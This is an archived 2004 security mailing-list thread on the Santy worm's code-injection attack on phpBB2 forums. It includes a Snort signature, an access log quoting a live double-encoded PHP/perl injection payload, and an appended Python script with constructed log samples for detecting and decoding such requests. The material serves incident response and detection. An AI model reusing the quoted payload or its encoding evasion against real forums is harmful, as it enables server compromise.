RE: Worm hitting PHPbb2 Forums

From: M. Shirk (shirkdog_list_at_hotmail.com)
Date: 12/22/04

  • Next message: Valdis.Kletnieks_at_vt.edu: "Re: [Full-Disclosure] RE: Worm hitting PHPbb2 Forums"
    To: incidents@securityfocus.com
    Date: Tue, 21 Dec 2004 19:53:09 -0500
    
    

    I missed an important "F" on my previous post for these snort sigs.

    alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"BLEEDING-EDGE phpBB Highlighting Code Execution - Santy.A Worm"; flow:to_server,established; uricontent:"/viewtopic.php?"; nocase; uricontent:"&highlight='.fwrite(fopen("; nocase; reference:url,www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513; sid:9999999; rev:1;)

    Shirkdog
    http://www.shirkdog.us

    >From: "Mike" <mike_sha@shaw.ca>
    >To: <mark@onnow.net>, "L. Walker" <lwalker@magi.net.au>
    >CC: <incidents@securityfocus.com>, <full-disclosure@lists.netsys.com>
    >Subject: RE: Worm hitting PHPbb2 Forums
    >Date: Tue, 21 Dec 2004 13:28:27 -0500
    >
    >Does this affect PHPBB2 in general, or is it platform specific as well?
    >
    >Mike Fetherston
    >
    > > -----Original Message-----
    > > From: mark@onnow.net [mailto:mark@onnow.net]
    > > Sent: Tuesday, December 21, 2004 12:47 PM
    > > To: L. Walker
    > > Cc: incidents@securityfocus.com; full-disclosure@lists.netsys.com
    > > Subject: Re: Worm hitting PHPbb2 Forums
    > >
    > > From what I have read, this can happen in any phpbb version lower
    > > than 2.0.11
    > >
    > > This exploit is becoming frequent. Normally uploading a ddos bot.
    > >
    > > Mark
    > >
    > > Quoting "L. Walker" <lwalker@magi.net.au>:
    > >
    > > > Just spotted two clients hit by this. One client didn't update his
    > > > software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16.
    > > > Chkrootkit says it's Adore, however could be something else. Datacenter
    > > > wasn't very smart and has since wiped the server, so no binaries or
    > > > other evidence.
    > > >
    > > > Generation 12 only wiped out PHP files, replacing them with its own
    > > > message on other client's PHPbb2 forum. Access logs show:
    > > >
    > > > 66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET /forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527 HTTP/1.0" 200 270 "http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    > > >
    > > > --
    > > > L. Walker <lwalker at magi dot net dot au>
    > > > Network Administrator / Consultant
    > > > --
    > > >
    > >
    > >
    > >
    > >
    >

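The Snort signature at the top of this message and the access-log line quoted from L. Walker both key on the same thing: a phpBB `highlight` parameter whose double URL-encoded value closes the string and injects a PHP call. The script below is an added example for log triage, not code from any poster in this thread nor from phpBB or Snort. It parses Apache access-log lines, strips both encoding layers (%2527 -> %27 -> '), flags any closing quote followed by a function call (a generalisation of the two literal strings `'.fwrite(fopen(` and `'.system(` that appear in the thread), and rewrites `chr(N).chr(N)...` runs into the literal they build so an analyst can see what the request tried to do. The log lines in `SAMPLE_LOG` are constructed (TEST-NET addresses, short chr() chains), not real traffic.

```python
"""Triage helper for the phpBB 'highlight' injection seen in this thread.

Added example, not code from any of the posters or from phpBB/Snort.  Log
lines in SAMPLE_LOG are constructed, not captured traffic.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache common/combined log prefix: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)'
)

# Closing quote, concatenation dot, function call: the shape of a highlight
# value that breaks out of the string and into PHP code. This generalises the
# literal '.fwrite(fopen( and '.system( strings quoted in the thread.
INJECT_RE = re.compile(r"'\s*\.\s*\w+\s*\(", re.IGNORECASE)

# A run of chr(N) calls joined by '.', used in the quoted log line to hide the
# command string from naive pattern matching.
CHR_RUN = re.compile(r'(?:chr\(\d{1,3}\)(?:\.(?=chr\())?)+', re.IGNORECASE)
CHR_ONE = re.compile(r'chr\((\d{1,3})\)', re.IGNORECASE)


def double_decode(value):
    """Undo two layers of percent-encoding: %2527 -> %27 -> ' ."""
    return unquote(unquote(value))


def decode_chr_chain(code):
    """Replace chr(104).chr(105) style runs with the quoted literal "hi"."""
    def repl(m):
        nums = CHR_ONE.findall(m.group(0))
        return '"' + ''.join(chr(int(n)) for n in nums) + '"'
    return CHR_RUN.sub(repl, code)


def analyse_request(target):
    """Return (is_injection, decoded_highlight) for one request target.

    parse_qs removes the first encoding layer; unquote removes the second,
    which is the layer the worm relies on to get past the first decode.
    """
    parts = urlsplit(target)
    if not parts.path.endswith('/viewtopic.php'):
        return False, None
    params = parse_qs(parts.query, keep_blank_values=True)
    for once in params.get('highlight', []):
        twice = unquote(once)
        if INJECT_RE.search(twice):
            return True, decode_chr_chain(twice)
    return False, None


def scan_log(lines):
    """Return [(ip, timestamp, decoded_payload)] for every hit in the log."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        is_injection, payload = analyse_request(m.group('target'))
        if is_injection:
            hits.append((m.group('ip'), m.group('ts'), payload))
    return hits


# Constructed sample lines: the first two mirror the shapes quoted in the
# thread (system() with a chr() chain, fwrite(fopen( ...)), the third is an
# ordinary forum search that must not be flagged.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Dec/2004:18:07:17 +1100] "GET /forum/viewtopic.php?p=1445'
    '&sid=deadbeef&highlight=%2527%252Esystem(chr(101)%252echr(99)%252echr(104)'
    '%252echr(111))%252e%2527 HTTP/1.0" 200 270 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [21/Dec/2004:18:09:02 +1100] "GET /forum/viewtopic.php?t=7'
    '&highlight=%2527%252Efwrite(fopen(chr(116)%252echr(46)%252echr(116)%252echr(120)'
    '%252echr(116),chr(119)),chr(120))%252e%2527 HTTP/1.0" 200 270 "-" "Mozilla/4.0"',
    '192.0.2.12 - - [21/Dec/2004:18:10:40 +1100] "GET /forum/viewtopic.php?t=7'
    '&highlight=santy HTTP/1.0" 200 8120 "-" "Mozilla/4.0"',
]

if __name__ == '__main__':
    for ip, ts, payload in scan_log(SAMPLE_LOG):
        print(f'{ip} [{ts}] highlight -> {payload}')
```

The check is deliberately done after the second decode rather than on the raw URI: the Snort rule above matches the literal `'.fwrite(fopen(` in the URI, so it fires on variants sent single-encoded, while the `%2527%252E` form in the quoted log line needs both layers removed before the quote-dot-call shape is visible. Running both views of the same request (raw URI match and decoded-parameter match) is what keeps a detection from being bypassed by a change of encoding depth.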

